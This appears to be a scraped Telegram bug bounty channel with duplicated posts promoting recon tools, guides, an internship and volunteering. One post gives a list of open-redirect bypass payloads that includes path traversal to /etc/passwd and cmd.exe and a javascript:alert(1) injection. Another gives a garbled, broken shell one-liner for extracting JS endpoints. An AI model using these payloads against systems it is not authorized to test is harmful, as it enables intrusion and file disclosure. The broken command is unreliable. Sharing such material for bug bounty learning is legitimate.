🚀 Exciting News! 🚀
We're launching our Internship Program soon, and we'd love to hear from you!
What are your expectations for this opportunity? 🤔
Drop your thoughts below! ⬇️
@anukulhexx
We're launching our Internship Program soon, and we'd love to hear from you!
What are your expectations for this opportunity? 🤔
Drop your thoughts below! ⬇️
@anukulhexx
🥰13👍5❤3🔥3
🌟 Take a Break from Bug Bounty – Give Back with Divriti Foundation! 🌟
Hey, bug bounty hunters! I know we're all deeply involved in finding vulnerabilities, but sometimes it’s good to step back and make a positive impact in other ways. If you’ve got a little time to spare, come join me with Divriti Foundation and let’s give back to the community and the environment!
Divriti, based in Delhi, India, is leading initiatives in:
🌱 Environmental Conservation: Tree planting and sustainability efforts.
📚 Education: Supporting underprivileged students.
🐾 Animal Welfare: Caring for street animals.
and more..
And here’s a bonus: by volunteering, you’ll also have more chances to connect with me personally. I’d be happy to share bug bounty tips, guidance, and insights when we work together on initiatives. So if you’re interested in both community work and learning opportunities, this is the perfect chance!
WhatsApp Group Link to Join
💚 Let’s make time for nature and community. Together, we can make a real difference!
Hey, bug bounty hunters! I know we're all deeply involved in finding vulnerabilities, but sometimes it’s good to step back and make a positive impact in other ways. If you’ve got a little time to spare, come join me with Divriti Foundation and let’s give back to the community and the environment!
Divriti, based in Delhi, India, is leading initiatives in:
🌱 Environmental Conservation: Tree planting and sustainability efforts.
📚 Education: Supporting underprivileged students.
🐾 Animal Welfare: Caring for street animals.
and more..
And here’s a bonus: by volunteering, you’ll also have more chances to connect with me personally. I’d be happy to share bug bounty tips, guidance, and insights when we work together on initiatives. So if you’re interested in both community work and learning opportunities, this is the perfect chance!
WhatsApp Group Link to Join
💚 Let’s make time for nature and community. Together, we can make a real difference!
❤4👍2😍2
🐞 I’ve noticed a lot of beginners in bug bounty and pentesting feel pretty lost. Many are overwhelmed or unsure where to begin, so I put together some tips on common mistakes.
Read through these and see if you’re missing anything!
https://vulncure.com/PDF/Guide__Common_Mistakes_by_Bug_Hunters_.pdf
#bugbounty #infosec
Read through these and see if you’re missing anything!
https://vulncure.com/PDF/Guide__Common_Mistakes_by_Bug_Hunters_.pdf
#bugbounty #infosec
🥰22👍15❤5👏2🔥1🙏1🤡1
Hey everyone! 🌟 Hope you’re all doing well in your current phase. I’m looking for a skilled React Native developer to join us and help mitigate some ongoing challenges. If you’re interested or know someone who might be a great fit, please reach out to me at @rootxabhishek. Thanks!
👍4
⚠️ S3 Bucket Recon ⚠️
Source : https://github.com/securitycipher/awsome-websecurity-checklist/blob/main/Mindmaps/S3-Bucket%20Recon.png
Source : https://github.com/securitycipher/awsome-websecurity-checklist/blob/main/Mindmaps/S3-Bucket%20Recon.png
👍13🔥5👏1
⚡️uro - Using a URL list for security testing can be painful as there are a lot of URLs that have uninteresting/duplicate content; uro aims to solve that.
🔗github.com/s0md3v/uro
🔗github.com/s0md3v/uro
😍6🔥4
☄️You can try this effective manual openredirect Bypass☄️
1. Null-byte injection:
- /google.com%00/
- //google.com%00
2. Base64 encoding variations:
- aHR0cDovL2dvb2dsZS5jb20=
- aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbQ==
- //base64:d3d3Lmdvb2dsZS5jb20=/
3. Case-sensitive variations:
- //GOOGLE.com/
- //GoOgLe.com/
4. Overlong UTF-8 sequences:
- %C0%AE%C0%AE%2F (overlong encoding for ../)
- %C0%AF%C0%AF%2F%2Fgoogle.com
5. Mixed encoding schemes:
- /%68%74%74%70://google.com
- //base64:%32%46%32%46%67%6F%6F%67%6C%65%2E%63%6F%6D
- //base64:%2F%2Fgoogle.com/
6. Alternative domain notations:
- //google.com@127.0.0.1/
- //127.0.0.1.xip.io/
- //0x7F000001/ (hexadecimal IP)
7. Trailing special characters:
- //google.com/#/
- //google.com/;&/
- //google.com/?id=123&//
8. Octal IP address format:
- http://0177.0.0.1/
- http://00177.0000.0000.0001/
9. IP address variants:
- http://3232235777 (decimal notation of an IP)
- http://0xC0A80001 (hex notation of IP)
- http://192.168.1.1/
10. Path traversal with encoding:
- /..%252f..%252f..%252fetc/passwd
- /%252e%252e/%252e%252e/%252e%252e/etc/passwd
- /..%5c..%5c..%5cwindows/system32/cmd.exe
11. Alternate protocol inclusion:
- ftp://google.com/
- javascript:alert(1)//google.com
12. Protocol-relative URLs:
- :////google.com/
- :///google.com/
13. Redirection edge cases:
- //google.com/?q=//bing.com/
- //google.com?q=https://another-site.com/
14. IPv6 notation:
- http://[::1]/
- http://[::ffff:192.168.1.1]/
15. Double URL encoding:
- %252f%252fgoogle.com (encoded twice)
- %255cgoogle.com
16. Combined traversal & encoding:
- /%2E%2E/%2E%2E/etc/passwd
- /%2e%2e%5c%2e%2e/etc/passwd
17. Reverse DNS-based:
- https://google.com.reverselookup.com
- //lookup-reversed.google.com/
18. Non-standard ports:
- http://google.com:81/
- https://google.com:444/
19. Unicode obfuscation in paths:
- /%E2%80%8Egoogle.com/
- /%C2%A0google.com/
20. Query parameters obfuscation:
- //google.com/?q=http://another-site.com/
- //google.com/?redirect=https://google.com/
21. Using @ symbol for userinfo:
- https://admin:password@google.com/
- http://@google.com
22. Combination of userinfo and traversal:
- https://admin:password@google.com/../../etc/passwd
1. Null-byte injection:
- /google.com%00/
- //google.com%00
2. Base64 encoding variations:
- aHR0cDovL2dvb2dsZS5jb20=
- aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbQ==
- //base64:d3d3Lmdvb2dsZS5jb20=/
3. Case-sensitive variations:
- //GOOGLE.com/
- //GoOgLe.com/
4. Overlong UTF-8 sequences:
- %C0%AE%C0%AE%2F (overlong encoding for ../)
- %C0%AF%C0%AF%2F%2Fgoogle.com
5. Mixed encoding schemes:
- /%68%74%74%70://google.com
- //base64:%32%46%32%46%67%6F%6F%67%6C%65%2E%63%6F%6D
- //base64:%2F%2Fgoogle.com/
6. Alternative domain notations:
- //google.com@127.0.0.1/
- //127.0.0.1.xip.io/
- //0x7F000001/ (hexadecimal IP)
7. Trailing special characters:
- //google.com/#/
- //google.com/;&/
- //google.com/?id=123&//
8. Octal IP address format:
- http://0177.0.0.1/
- http://00177.0000.0000.0001/
9. IP address variants:
- http://3232235777 (decimal notation of an IP)
- http://0xC0A80001 (hex notation of IP)
- http://192.168.1.1/
10. Path traversal with encoding:
- /..%252f..%252f..%252fetc/passwd
- /%252e%252e/%252e%252e/%252e%252e/etc/passwd
- /..%5c..%5c..%5cwindows/system32/cmd.exe
11. Alternate protocol inclusion:
- ftp://google.com/
- javascript:alert(1)//google.com
12. Protocol-relative URLs:
- :////google.com/
- :///google.com/
13. Redirection edge cases:
- //google.com/?q=//bing.com/
- //google.com?q=https://another-site.com/
14. IPv6 notation:
- http://[::1]/
- http://[::ffff:192.168.1.1]/
15. Double URL encoding:
- %252f%252fgoogle.com (encoded twice)
- %255cgoogle.com
16. Combined traversal & encoding:
- /%2E%2E/%2E%2E/etc/passwd
- /%2e%2e%5c%2e%2e/etc/passwd
17. Reverse DNS-based:
- https://google.com.reverselookup.com
- //lookup-reversed.google.com/
18. Non-standard ports:
- http://google.com:81/
- https://google.com:444/
19. Unicode obfuscation in paths:
- /%E2%80%8Egoogle.com/
- /%C2%A0google.com/
20. Query parameters obfuscation:
- //google.com/?q=http://another-site.com/
- //google.com/?redirect=https://google.com/
21. Using @ symbol for userinfo:
- https://admin:password@google.com/
- http://@google.com
22. Combination of userinfo and traversal:
- https://admin:password@google.com/../../etc/passwd
🔥10👍7❤3👏2
🔖AWS penetration testing: A step-by-step Guide for Beginners
☄️https://www.hackthebox.com/blog/aws-pentesting-guide
☄️https://www.hackthebox.com/blog/aws-pentesting-guide
⚡7🥰4👏4❤3
🔖Ex-param - an automated tool designed for finding reflected parameters for XSS vulnerabilities
✅https://github.com/rootDR/ex-param
✅https://github.com/rootDR/ex-param
🔥14👍2🥱1
This media is not supported in your browser
VIEW IN TELEGRAM
🔍 gitlab-subdomains - A Go-based tool to uncover subdomains via GitLab searches.
🔗https://github.com/gwen001/gitlab-subdomains
🔗https://github.com/gwen001/gitlab-subdomains
👏8👍3❤1
Extract all endpoints from a JS File and take your bug 🐞
✅Method one
✅Method two
#infosec #cybersec #bugbountytips
✅Method one
waybackurls HOSTS | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?
15*[=: 1\5*[ '\"]?[^'\"]+.js[^'|"> ]*" | awk -F '/'
'{if(length($2))print "https://"$2}' | sort -fu | xargs -I '%' sh
-c "curl -k -s \"%)" | sed \"s/[;}\)>]/\n/g\" | grep -Po \" (L'1|\"](https?: )?[/1{1,2}[^'||l"> 1{5,3)|(\.
(get|post|ajax|load)\s*\(\5*['||\"](https?:)?[/1{1,2}[^'||\"> ]
{5,})\"" | awk -F "['|"]" '{print $2}' sort -fu
✅Method two
cat JS.txt | grep -aop "(?<=(\"|\'|' ))\/[a-zA-Z0-9?&=\/-#.](?= (\"||'|'))" | sort -u | tee JS.txt
#infosec #cybersec #bugbountytips
👍19🥰3❤2
⚡️Want to download 100+ Bug Bounty Tips collected from X?
✅Download the PDF from here
#BugBounty #bugbountytips
✅Download the PDF from here
#BugBounty #bugbountytips
❤5👍3🔥1
🔖 Dnsbruter - A powerful tool for active subdomain enumeration and discovery.
✨ Features:
Dnsbruter uses DNS resolution to bruteforce and identify subdomains efficiently. Its multithreading capability allows users to control concurrency for faster and more effective results. Perfect for researchers and pen testers targeting domain reconnaissance.
🔗 https://github.com/RevoltSecurities/Dnsbruter/
✨ Features:
Dnsbruter uses DNS resolution to bruteforce and identify subdomains efficiently. Its multithreading capability allows users to control concurrency for faster and more effective results. Perfect for researchers and pen testers targeting domain reconnaissance.
🔗 https://github.com/RevoltSecurities/Dnsbruter/
❤11👍5
🚀 Exciting News for #InfoSec & #BugBounty! 🛡
ProxSec v1.0.0 is out—an open-source extension for security pros! 🔥
✅ Proxy management
✅ Scope validation
✅ Program tracking
✅ Lightweight & private
Open-Source : https://github.com/aacle/ProxSec
Feedback welcome! 💬
ProxSec v1.0.0 is out—an open-source extension for security pros! 🔥
✅ Proxy management
✅ Scope validation
✅ Program tracking
✅ Lightweight & private
Open-Source : https://github.com/aacle/ProxSec
Feedback welcome! 💬
❤11🥰4